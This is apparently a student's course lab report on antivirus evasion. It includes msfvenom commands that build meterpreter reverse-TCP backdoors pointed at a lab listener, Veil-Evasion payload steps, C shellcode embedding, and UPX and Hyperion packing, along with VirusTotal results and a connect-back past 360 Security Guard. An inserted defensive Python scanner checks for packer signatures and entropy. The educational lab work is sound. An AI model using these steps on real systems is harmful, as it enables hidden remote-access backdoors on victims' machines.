2019-2020-2 20175316 Song Shengmao "Network Warfare Technology" Exp3: AV Evasion, Principles and Practice

I. Experiment objectives

  • Become familiar with the concept of a backdoor
  • Use netcat to establish a backdoor connection between Windows and Linux
  • Master the use of meterpreter
  • Understand the use of MSF post modules
  • Learn the ways a backdoor can be started on Windows and Linux

II. Basic questions

1. How does antivirus software detect malicious code?

  • Signature-based detection (the virus database must be updated regularly)
  • Heuristic malware detection (real-time monitoring, large overhead)
  • Behaviour-based malware detection (for example, API monitoring)

2. What does AV evasion do?

  • It uses disguise, encryption and decryption of the shellcode, deformation, rewriting with Veil, recompiling and other means so that the generated backdoor is not detected and removed by antivirus software

3. Basic methods of AV evasion

  • Change the signature
    • Packing (for an existing .exe file)
      • Compression packers
      • Encryption packers
    • shellcode + encoder
    • Rewriting and recompiling (veil-evasion or by hand)
    • Semi-manual methods (the mainstream approach)
  • Change the behaviour
    • Communication method
      • Prefer a reverse connection
      • Use tunnelling techniques
      • Encrypt the communication (for example, HTTPS)
    • Operating mode
      • Operate in memory
      • Reduce modifications to the system
      • Add code with normal functionality that serves to obfuscate the program

III. Experiment content

Task 1: Use msf encoders correctly, generate other file types with msfvenom (such as jar), use Veil, use a packer, and use the C + shellcode programming method (other approaches are not described here)

1. Testing AV evasion

  • Take the backdoor program generated with msf in Experiment 2 and scan it with VirusTotal or Virscan.
    • VirusTotal scan results: 58 of 72 engines reported the virus, so an unprocessed backdoor is detected by most antivirus products

    • Msfvenom is the tool on the Metasploit platform used to encode payloads for AV evasion. Because Metasploit is so visible and popular, as soon as a new encoding algorithm appears, AV vendors immediately add its signatures to their databases.

2. Use an msf encoder to generate an exe

  • In theory, encoding lowers the detection rate; in practice, no matter how many more times it is encoded, it can still be detected.
  • The encoding command: -e selects the encoder, and -b lists the characters that must be removed from the payload, here '\x00', so that the shellcode contains no null byte, because a '\x00' inside the shellcode would be treated as a string terminator
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.129 LPORT=5316 -f exe > met-encoded.exe

  • Generate a backdoor encoded ten times (-i 10):
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.128 LPORT=5316 -f exe > encoded10.exe

  • This shows that although the probability of detection falls after encoding, most antivirus products can still detect it.

3. Generate other file types with msfvenom

  • Generate a Java backdoor with the command:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x > 20175316jar.jar

  • VirusTotal test results:

  • Generate a jsp file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316jsp.jsp

  • VirusTotal test results:

  • Generate a php file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316php.php

  • The VirusTotal scan results are as follows; noticeably fewer engines detect it

  • Generate an apk file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316apk.apk

  • VirusTotal test results:

4. Generate and test a backdoor with veil-evasion

  • Install Veil with the command sudo apt-get install veil; after much trouble it finally worked, and the problems encountered during installation and their solutions are given at the end

  • Success

  • Enter veil to bring up the Veil interface

  • Enter use evasion

  • Enter the command use c/meterpreter/rev_tcp.py to open the configuration interface

  • Use set LHOST 192.168.136.128 to set the reverse connection IP address (note that this is the IP of the Kali virtual machine)

  • Use set LPORT 5316 to set the port

  • Use the generate command to generate the file, then enter the payload name veil20175316; it is saved at /var/lib/veil/output/source/veil20175316.exe

  • Upload it to VirusTotal to see how well the Veil-generated file evades detection

  • The results show that Veil is not very effective: more than half of the antivirus engines still flag it

5. Inject and execute shellcode (embedded shellcode)

  • First, use the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 -f c

  • Create the file 20175316.c and assign the generated array to unsigned char buf[], as follows:

  • Use the command i686-w64-mingw32-g++ 20175316.c -o 20175316.exe to compile the .c file into an executable

  • But VirusTotal still finds a lot of problems with it

6. Packer tools

  • A compression packer compresses the program's resources; the program still runs after compression.
  • Packers are needed to prevent external programs or software from disassembling, analysing or dynamically analysing the packed program, protecting the original program from being damaged by external programs and ensuring it still runs normally.
  • They can be used to protect copyright, but many viruses also use the same principle.

Use the command upx 20175316.exe -o 20175316_2.exe to pack 20175316.exe

  • Upload to VirusTotal

(After packing, slightly fewer engines detect it, but more than half still do)
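The two detection ideas from section II.1 (signature matching and a heuristic) explain why the UPX-packed file above is still caught by more than half of the engines: UPX writes recognisable markers into the output, and compression drives the byte entropy of the file close to its maximum. The following Python script is an added example of that defender-side check; it is not code from the report. The "UPX!" marker and the "UPX0" section name are real strings found in UPX-packed executables, while the signature table, the 7.0 bits-per-byte entropy threshold and both sample inputs are constructed for the example.

```python
import math
import random
from collections import Counter

# Byte patterns a signature scanner would look for. "UPX!" and the "UPX0"
# section name are real markers that UPX writes into packed executables;
# the table itself is constructed for this example.
SIGNATURES = {
    "upx_marker": b"UPX!",
    "upx_section": b"UPX0",
}

# Shannon entropy above this value (bits per byte, maximum 8.0) is treated
# as a sign of compressed or encrypted content. The threshold is an
# assumption chosen for the example, not a value from the report.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def signature_hits(data: bytes) -> list:
    """Signature-based detection: the names of every known pattern present in the data."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def classify(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> dict:
    """Combine the signature check with the entropy heuristic, as a scanner would."""
    hits = signature_hits(data)
    entropy = shannon_entropy(data)
    return {
        "signature_hits": hits,
        "entropy": round(entropy, 2),
        "high_entropy": entropy >= threshold,
        "suspicious": bool(hits) or entropy >= threshold,
    }


# Constructed samples, not real executables. The "plain" sample is low-entropy
# text; the "packed" sample imitates a UPX-packed file: UPX section names and
# the UPX marker followed by a deterministic pseudo-random body standing in
# for the compressed payload.
SAMPLE_PLAIN = b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 100
_rng = random.Random(20175316)
SAMPLE_PACKED = (
    b"MZ" + b"UPX0" + b"UPX1" + b"UPX!"
    + bytes(_rng.getrandbits(8) for _ in range(8192))
)


def scan_samples() -> dict:
    """Classify both constructed samples and return the verdicts by name."""
    return {"plain": classify(SAMPLE_PLAIN), "packed": classify(SAMPLE_PACKED)}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(name, verdict)
```

The plain sample has no signature hit and an entropy of roughly 4 bits per byte, so it is not flagged; the packed sample trips both the marker signature and the entropy heuristic. Entropy on its own is only a hint, since legitimately compressed resources and installers also score high, which is why real scanners pair it with signatures and, for a well-known packer like UPX, simply unpack the file and scan the original code inside.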

7. Other methods

  • Use Veil-Evasion's other payload generation modes to build a backdoor

  • Enter use evasion

  • Use list to view the available payloads:

  • Select the payload cs/shellcode_inject/virtual.py

  • Enter options to see the payload's options

  • Enter generate and select 2; after choosing the platform, modify the user name for the shellcode

  • Enter the output file name and select Py2Exe to generate the exe file

  • Afterwards, the resulting rc file is placed in /var/lib/veil/output/handlers/ and the executable in /var/lib/veil/output/source/

  • Upload the executable to VirusTotal to see the effect:

  • Perfect

Task 2: Combine the techniques above to make the malicious code evade detection (if evasion is achieved, describe the principle in simple terms, without screenshots, and verify the result of coexisting with the antivirus software.)

  • Method 1
    • Use msfvenom -l encoders to list the encoders that can be used to generate different backdoors
    • Use a single encoder, iterated several times, to generate a C-language shellcode array, build an exe from it, and then pack it with a compression packer (UPX) and an encryption packer (Hyperion)
  • Method 2
    • The exe generated earlier with Veil's c/meterpreter/rev_tcp.py, packed with UPX compression, successfully evades Tencent PC Manager
    • Then start the listener on Kali and connect back

Task 3: Test on another computer with antivirus software running and successfully connect back; state the name and version of that computer's antivirus software

  • Computer environment: Win7
  • Antivirus name: 360 Security Guard (11.5.0.2001)

IV. Problems encountered during the experiment and their solutions

Problem 1

  • Veil could not be installed
  • Solution
    1. Before installing, change the system sources and update:
sudo su
apt-get purge veil-evasion
apt-get update
apt-get upgrade

2. Before installing, run the following commands to set up wine32:

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

3. Use the command cd /usr/share/veil/config/ to enter the folder and ls to view its contents.
Edit the file with vim setup.sh and change the GitHub repository on line 251 to the Gitee mirror https://gitee.com/spears/VeilDependencies.git

4. The following problem was encountered when running the subsequent commands

V. Summary and insights

The reverse connection often fails, especially with the encryption packer; I think it is probably metaphysics. (Yes, I have not solved this problem.)
Emmm, to be honest, when I tested it, evasion succeeded, but a few hours later it could no longer evade detection. So if I change the shellcode and do it again, can evasion still be achieved once PC Manager has updated its virus database, or not?
I still do not know how to evade Windows Defender when none of the other antivirus products like 360 or PC Manager are installed (after all, every experiment I tried is a total failure against Windows Defender..)

Source: www.cnblogs.com/sms369/p/12621159.html